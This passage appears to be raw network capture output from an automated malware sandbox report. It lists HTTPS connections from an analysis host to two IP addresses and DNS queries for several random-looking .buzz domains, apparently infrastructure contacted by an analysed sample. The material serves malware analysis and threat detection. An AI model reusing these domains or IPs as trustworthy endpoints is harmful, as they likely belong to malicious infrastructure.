                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570568085 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570597887 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570667028 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570719004 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570753098 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.570780039 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.756366968 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.756401062 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.756443024 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.756467104 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.756508112 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.789808989 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.789836884 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.789870024 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.789877892 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.789932013 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.792138100 CET49708443192.168.2.523.55.153.106
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.792151928 CET4434970823.55.153.106192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.960452080 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.960526943 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.960594893 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.961162090 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.961184025 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.189157963 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.189348936 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.192418098 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.192436934 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.192771912 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.194248915 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.194267035 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.194344997 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927450895 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927695990 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.927902937 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928533077 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928587914 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928627014 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.928644896 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968405008 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968444109 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.968529940 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.969043970 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:02.969055891 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.233956099 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.234024048 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235774040 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235789061 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.235995054 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237854958 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237941980 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:04.237966061 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008078098 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008138895 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008199930 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008224964 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008444071 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008501053 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.008511066 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009366989 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009392977 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009416103 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009422064 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.009468079 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.016002893 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026737928 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026807070 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.026813984 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.079859972 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.079869986 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.126785994 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.127686977 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.173602104 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.209039927 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214061975 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214138031 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214135885 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214167118 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214257002 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214257002 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214314938 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214423895 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214457035 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214469910 CET49710443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.214476109 CET44349710104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.412969112 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413026094 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413099051 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413433075 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:05.413449049 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.674063921 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.674165010 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690258026 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690306902 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.690629005 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.699609995 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.703847885 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:06.703902960 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.625935078 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626064062 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626135111 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626231909 CET49711443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.626275063 CET44349711104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721573114 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721658945 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.721754074 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.722013950 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:07.722045898 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.988437891 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.988621950 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990022898 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990056992 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.990418911 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991667986 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991799116 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991861105 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:08.991925001 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:09.039350986 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.324836016 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325010061 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325088978 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325185061 CET49712443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.325227976 CET44349712104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.503844976 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.503901005 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.504100084 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.504345894 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:10.504371881 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.790112019 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.790230989 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.791609049 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.791625023 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.792017937 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.793220043 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.793369055 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.793420076 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.793494940 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:11.793504953 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.680398941 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.680649996 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.680716991 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.680859089 CET49713443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.680881023 CET44349713104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.937990904 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.938086987 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.938175917 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.938457966 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:12.938494921 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.249154091 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.249228001 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.250837088 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.250874043 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.251194000 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.252957106 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.253164053 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:14.253175974 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.051660061 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.051930904 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.052087069 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.052202940 CET49714443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.052242041 CET44349714104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.537677050 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.537717104 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.537787914 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.538058996 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:15.538070917 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.798607111 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.798762083 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.800158024 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.800173998 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.800565958 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.845463037 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.867391109 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.868103027 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.868249893 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.868530035 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.868566990 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.868788004 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870131969 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870315075 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870347977 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870531082 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870562077 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870774984 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870801926 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870815992 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.870831966 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.871021032 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.871049881 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.871072054 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.871243000 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.871272087 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915338039 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915550947 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915580034 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915611029 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915647984 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915695906 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:16.915709972 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.230926037 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.231060028 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.231138945 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.231520891 CET49719443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.231540918 CET44349719104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.270591974 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.270623922 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.270736933 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.271003962 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:19.271013021 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.536516905 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.536647081 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.541925907 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.541935921 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.542332888 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.553620100 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.553653955 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:20.553783894 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.336307049 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.336560965 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.336626053 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.336642981 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.337040901 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.337095022 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.337100983 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.342300892 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.342356920 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.342360973 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.350770950 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.350827932 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.350832939 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.392314911 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455679893 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455790043 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455853939 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455862045 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455902100 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.455957890 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.456053019 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.456065893 CET44349727104.21.66.86192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.456079006 CET49727443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:21.456084013 CET44349727104.21.66.86192.168.2.5

                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.855360985 CET4977653192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.993011951 CET53497761.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.997813940 CET5743153192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.135519028 CET53574311.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.140993118 CET5770053192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.279089928 CET53577001.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.283504009 CET5547853192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.420448065 CET53554781.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.422764063 CET5676253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.560283899 CET53567621.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.564017057 CET6176253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.701679945 CET53617621.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.703572035 CET4961453192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.841408968 CET53496141.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.846935034 CET5035253192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.984738111 CET53503521.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.993944883 CET5550453192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.131542921 CET53555041.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.210289001 CET6200053192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:58.347234964 CET53620001.1.1.1192.168.2.5
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.821491957 CET6271553192.168.2.51.1.1.1
                                                                                                                                                                                                                                            Dec 28, 2024 02:55:00.959465027 CET53627151.1.1.1192.168.2.5

                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.855360985 CET192.168.2.51.1.1.10x6d7Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:56.997813940 CET192.168.2.51.1.1.10x19f2Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.140993118 CET192.168.2.51.1.1.10xa01aStandard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.283504009 CET192.168.2.51.1.1.10x9548Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 28, 2024 02:54:57.422764063 CET192.168.2.51.1.1.10xb055Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
